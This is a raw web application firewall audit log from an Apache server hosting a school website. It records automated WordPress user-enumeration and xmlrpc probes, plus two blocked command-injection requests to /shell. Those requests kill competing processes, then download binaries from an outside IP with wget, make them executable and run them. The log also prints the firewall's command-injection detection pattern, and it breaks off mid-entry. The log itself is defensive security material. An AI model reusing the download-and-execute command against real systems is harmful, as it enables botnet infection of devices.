Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37c2f61e-Z-- --68f28907-A-- [04/May/2025:04:42:48 +0700] aBaN2PnZiHJYHUAF8QfZfAAAAAU 103.236.140.4 55198 103.236.140.4 8181 --68f28907-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.167.210 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.167.210 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --68f28907-C-- demo.sayHello --68f28907-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --68f28907-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746308568544568 4669 (- - -) Stopwatch2: 1746308568544568 4669; combined=3687, p1=437, p2=3041, p3=26, p4=25, p5=92, sr=65, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68f28907-Z-- --a594fd34-A-- [04/May/2025:04:47:32 +0700] aBaO9GJEE9ao5dcyYWnsoAAAAIw 103.236.140.4 55232 103.236.140.4 8181 --a594fd34-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.50 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a594fd34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a594fd34-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746308852821918 3241 (- - -) Stopwatch2: 1746308852821918 3241; combined=1397, p1=518, p2=849, p3=0, p4=0, p5=30, sr=142, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a594fd34-Z-- --57109009-A-- [04/May/2025:04:47:38 +0700] aBaO-mJEE9ao5dcyYWnsogAAAI4 103.236.140.4 55236 103.236.140.4 8181 --57109009-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.50 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --57109009-C-- demo.sayHello --57109009-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --57109009-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746308858824028 5196 (- - -) Stopwatch2: 1746308858824028 5196; combined=3988, p1=530, p2=3244, p3=21, p4=26, p5=96, sr=135, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57109009-Z-- --7e205c50-A-- [04/May/2025:04:48:07 +0700] aBaPF9sVQyl9V2B8Pt-tsQAAAFM 103.236.140.4 55240 103.236.140.4 8181 --7e205c50-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.34.242 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.34.242 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7e205c50-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7e205c50-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746308887966978 3235 (- - -) Stopwatch2: 1746308887966978 3235; combined=1398, p1=517, p2=851, p3=0, p4=0, p5=30, sr=147, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7e205c50-Z-- --620a254c-A-- [04/May/2025:04:48:11 +0700] aBaPG2JEE9ao5dcyYWnsowAAAI8 103.236.140.4 55244 103.236.140.4 8181 --620a254c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.34.242 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.34.242 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --620a254c-C-- demo.sayHello --620a254c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --620a254c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746308891502941 4134 (- - -) Stopwatch2: 1746308891502941 4134; combined=2877, p1=545, p2=2176, p3=18, p4=17, p5=70, sr=142, sw=51, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --620a254c-Z-- --c362ee30-A-- [04/May/2025:05:07:54 +0700] aBaTumJEE9ao5dcyYWns3QAAAIY 103.236.140.4 55496 103.236.140.4 8181 --c362ee30-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.117.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.117.54 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c362ee30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c362ee30-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746310074417483 3397 (- - -) Stopwatch2: 1746310074417483 3397; combined=1443, p1=473, p2=937, p3=0, p4=0, p5=32, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c362ee30-Z-- --8f9d4a1c-A-- [04/May/2025:05:08:04 +0700] aBaTxNsVQyl9V2B8Pt-tvQAAAE4 103.236.140.4 55500 103.236.140.4 8181 --8f9d4a1c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.117.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.117.54 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8f9d4a1c-C-- demo.sayHello --8f9d4a1c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f9d4a1c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746310084249222 6610 (- - -) Stopwatch2: 1746310084249222 6610; combined=4683, p1=625, p2=3799, p3=37, p4=36, p5=108, sr=129, sw=78, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f9d4a1c-Z-- --3a1cd32a-A-- [04/May/2025:05:08:16 +0700] aBaT0GJEE9ao5dcyYWns4AAAAIg 103.236.140.4 55506 103.236.140.4 8181 --3a1cd32a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.31 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.31 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3a1cd32a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a1cd32a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746310096886208 2910 (- - -) Stopwatch2: 1746310096886208 2910; combined=1269, p1=449, p2=790, p3=0, p4=0, p5=30, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a1cd32a-Z-- --99e16f46-A-- [04/May/2025:05:08:22 +0700] aBaT1mJEE9ao5dcyYWns4gAAAIs 103.236.140.4 55510 103.236.140.4 8181 --99e16f46-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.31 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.31 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --99e16f46-C-- demo.sayHello --99e16f46-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --99e16f46-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746310102759951 5662 (- - -) Stopwatch2: 1746310102759951 5662; combined=4191, p1=545, p2=3335, p3=29, p4=31, p5=139, sr=97, sw=112, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --99e16f46-Z-- --00438968-A-- [04/May/2025:05:08:39 +0700] aBaT52JEE9ao5dcyYWns5AAAAI0 103.236.140.4 55514 103.236.140.4 8181 --00438968-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.224 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.224 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --00438968-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --00438968-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746310119515660 3088 (- - -) Stopwatch2: 1746310119515660 3088; combined=1290, p1=432, p2=823, p3=0, p4=0, p5=35, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00438968-Z-- --0d1a3632-A-- [04/May/2025:05:08:45 +0700] aBaT7WJEE9ao5dcyYWns5gAAAI8 103.236.140.4 55518 103.236.140.4 8181 --0d1a3632-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.224 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.224 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0d1a3632-C-- demo.sayHello --0d1a3632-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d1a3632-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746310125638852 4360 (- - -) Stopwatch2: 1746310125638852 4360; combined=2989, p1=459, p2=2374, p3=26, p4=27, p5=62, sr=67, sw=41, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d1a3632-Z-- --fd573575-A-- [04/May/2025:05:15:37 +0700] aBaViechPF6irSergtv7KgAAANY 103.236.140.4 55608 103.236.140.4 8181 --fd573575-B-- GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+drea4+arm7;wget+http:/\/176.65.144.76/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\/176.65.144.76/drea4;chmod+777+drea4;./drea4+jaws HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.218.84.39 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.218.84.39 X-Forwarded-Proto: http Connection: close Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: en-US,en;q=0.9 --fd573575-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd573575-E-- --fd573575-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:killall -9 arm7;killall -9 arm4;killall -9 arm;killall -9 /bin/sh;killall -9 /bin/sh;killall -9 /z/bin;killall -9 /bin/bash;cd /tmp;rm drea4 arm7;wget http:/\x5c\x5c/176.65.144.76/efefa7;chmod 777 efefa7;./efefa7 jaws;wget http:/\x5c\x5c/176.65.144.76/drea4;chmod 777 drea4;./drea4 jaws: killall -9 arm7 killall -9 arm4 killall -9 arm killall -9/bin/sh killall -9/bin/sh killall -9/z/bin killall -9/bin/bash cd/tmp rm drea4 arm7 wget http://176.65.144.76/efefa7 chmod..."] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746310537789210 2826 (- - -) Stopwatch2: 1746310537789210 2826; combined=847, p1=490, p2=311, p3=0, p4=0, p5=45, sr=74, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd573575-Z-- --cb938649-A-- [04/May/2025:05:43:28 +0700] aBacEPnZiHJYHUAF8QfZlQAAAAA 103.236.140.4 55758 103.236.140.4 8181 --cb938649-B-- GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+drea4+arm7;wget+http:/\/176.65.144.76/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\/176.65.144.76/drea4;chmod+777+drea4;./drea4+jaws HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.218.84.39 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.218.84.39 X-Forwarded-Proto: http Connection: close Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: en-US,en;q=0.9 --cb938649-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb938649-E-- --cb938649-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:killall -9 arm7;killall -9 arm4;killall -9 arm;killall -9 /bin/sh;killall -9 /bin/sh;killall -9 /z/bin;killall -9 /bin/bash;cd /tmp;rm drea4 arm7;wget http:/\x5c\x5c/176.65.144.76/efefa7;chmod 777 efefa7;./efefa7 jaws;wget http:/\x5c\x5c/176.65.144.76/drea4;chmod 777 drea4;./drea4 jaws: killall -9 arm7 killall -9 arm4 killall -9 arm killall -9/bin/sh killall -9/bin/sh killall -9/z/bin killall -9/bin/bash cd/tmp rm drea4 arm7 wget http://176.65.144.76/efefa7 chmod..."] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746312208770839 2476 (- - -) Stopwatch2: 1746312208770839 2476; combined=791, p1=486, p2=273, p3=0, p4=0, p5=31, sr=78, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb938649-Z-- --7a942e52-A-- [04/May/2025:05:49:08 +0700] aBadZOchPF6irSergtv7MgAAAM0 103.236.140.4 55800 103.236.140.4 8181 --7a942e52-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.1 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.1 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7a942e52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a942e52-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746312548906789 3363 (- - -) Stopwatch2: 1746312548906789 3363; combined=1444, p1=474, p2=938, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a942e52-Z-- --b1164f4f-A-- [04/May/2025:05:49:13 +0700] aBadaWJEE9ao5dcyYWntGwAAAI4 103.236.140.4 55804 103.236.140.4 8181 --b1164f4f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.1 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.1 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b1164f4f-C-- demo.sayHello --b1164f4f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1164f4f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746312553576451 3437 (- - -) Stopwatch2: 1746312553576451 3437; combined=2623, p1=330, p2=2143, p3=18, p4=18, p5=67, sr=50, sw=47, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1164f4f-Z-- --da6c7570-A-- [04/May/2025:05:50:13 +0700] aBadpdsVQyl9V2B8Pt-tyAAAAEk 103.236.140.4 55814 103.236.140.4 8181 --da6c7570-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.238 X-Forwarded-Proto: https Connection: close User-Agent: 